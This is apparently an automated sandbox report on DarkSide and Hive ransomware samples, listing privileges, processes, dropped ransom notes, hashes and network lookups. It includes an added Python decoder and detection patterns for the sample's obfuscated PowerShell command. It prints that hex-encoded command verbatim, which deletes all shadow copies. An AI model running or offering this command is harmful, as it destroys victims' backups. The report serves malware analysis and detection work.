Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe
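The powershell.exe command line in the process list above is the sample's shadow-copy wiper: the `(0..61)|%{...}` loop rebuilds a string two hex characters at a time from the embedded literal and hands it to `iex`, which is why vssvc.exe appears with SeBackupPrivilege and SeRestorePrivilege right after it. As an added example that is not part of the sandbox report, the following Python statically emulates that loop (decoding only the bytes the range actually reads) and matches the result against shadow-copy deletion patterns; the command line is copied verbatim from above, and the pattern list and helper names are the example's own.

```python
import re
from typing import Dict, List, Optional

# The PowerShell command line from the behavioral22 process list above, copied
# verbatim. The hex literal is the sample's; the decoder is an added example.
SAMPLE_CMDLINE = (
    "powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'"
    "4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20"
    "466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20"
    "'.Substring(2*$_,2))};iex $s\""
)

# Inclusive PowerShell range, e.g. (0..61), and the hex literal that is sliced
# two characters at a time with .Substring(2*$_,2).
RANGE_RE = re.compile(r"\((\d+)\.\.(\d+)\)")
HEX_RE = re.compile(r"'([0-9A-Fa-f]+)'\.Substring\(2\*\$_,\s*2\)")

# Shadow-copy destruction idioms a decoded payload may reveal (assumed list).
SHADOW_COPY_PATTERNS = (
    r"Win32_Shadowcopy\b.*?(\.Delete\(\)|Remove-WmiObject|Remove-CimInstance)",
    r"\bvssadmin(\.exe)?\s+delete\s+shadows",
    r"\bwmic(\.exe)?\s+shadowcopy\s+delete",
)


def decode_hex_loop(cmdline: str) -> Optional[str]:
    """Statically emulate the (a..b)|%{ ... Substring(2*$_,2) } loop.

    Only the bytes the loop actually reads are decoded: (0..61) yields 62
    characters even though the literal in this sample holds 63 bytes.
    """
    m_range = RANGE_RE.search(cmdline)
    m_hex = HEX_RE.search(cmdline)
    if not (m_range and m_hex):
        return None
    start, end = int(m_range.group(1)), int(m_range.group(2))
    blob = m_hex.group(1)
    chars = []
    for i in range(start, end + 1):
        chunk = blob[2 * i:2 * i + 2]
        if len(chunk) < 2:          # PowerShell would throw here; stop cleanly
            break
        chars.append(chr(int(chunk, 16)))
    return "".join(chars)


def analyze_cmdline(cmdline: str) -> Dict:
    """Decode the payload (if the loop shape is present) and match it."""
    decoded = decode_hex_loop(cmdline)
    hits: List[str] = []
    if decoded is not None:
        hits = [p for p in SHADOW_COPY_PATTERNS
                if re.search(p, decoded, re.IGNORECASE)]
    return {
        "decoded": decoded,
        "shadow_copy_deletion": bool(hits),
        "execution_policy_bypass": bool(
            re.search(r"-e\w*\s+bypass", cmdline, re.IGNORECASE)),
    }


if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
```

Decoding rather than just flagging `-ep bypass` matters here: nothing in the raw command line mentions shadow copies, so a detection keyed on `vssadmin` or `wmic shadowcopy` strings alone misses it, while the Script Block Logging event (Event ID 4104) for the `iex`'d string, or the vssvc.exe privilege use shown above, catches it at runtime.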

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

memory/4052-0-0x0000000000910000-0x0000000000920000-memory.dmp

memory/3124-1-0x00007FFB937C3000-0x00007FFB937C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5lmzo3zz.2x1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3124-8-0x000002BEB2E10000-0x000002BEB2E32000-memory.dmp

memory/3124-12-0x00007FFB937C0000-0x00007FFB94281000-memory.dmp

memory/3124-15-0x00007FFB937C0000-0x00007FFB94281000-memory.dmp

C:\Users\README.6f83c4b2.TXT

MD5 25d0b19a0ec34a39dfa3e177866f01a3
SHA1 a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256 f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512 ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

memory/4052-26-0x0000000000910000-0x0000000000920000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7bd0d74ff0bb98e8751cae71652ed62e
SHA1 caff8e2a964e2900fbe38a3f243499c126b3d4e4
SHA256 64c6fad7f8c73c79d9c041118f7fef91738366bc17ff7f8cee2876dacbc25113
SHA512 df72f1960f1fddf04497e38afee3a40ab8ed7f9fd9d701b83ef2e1cbd63530447f596297acbc215abef7ae08cdd381dc6dcf1e1f5ffdbfa25d82ab357bf68892

memory/4052-54-0x0000000000910000-0x0000000000920000-memory.dmp

memory/4052-230-0x0000000000910000-0x0000000000920000-memory.dmp

memory/4052-237-0x0000000000910000-0x0000000000920000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:12

Platform

win7-20240704-en

Max time kernel

1563s

Max time network

1690s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

Signatures

Detects Go variant of Hive Ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Hive

ransomware hive

Deletes shadow copies

ransomware defense_evasion impact execution

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\etc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Boot or Logon Autostart Execution: Print Processors

persistence

Heuristic hit: the entries below are HOW_TO_DECRYPT.txt ransom notes written into the print processor directory as the encryptor walks the filesystem, not print processor DLLs, so on their own they do not establish print-processor persistence.
Description Indicator Process Target
File created C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\prtprocs\x64\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.-uYcD1toMB6z-bE3g_VWOQ7EUj-WNiccrn6Rqkkqn3Q.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Heuristic hit: the desktop.ini entries below under Feeds Cache, Temporary Internet Files and History show the encryptor touching browser profile directories while enumerating files to encrypt, which is what triggers this signature for a file encryptor.

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\E9P9LRO9\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OJBRRE9R\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\FGBCC7A8\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JVMDVGRW\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G4UA8T7D\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FH198YO1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XLI5Q0EH\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
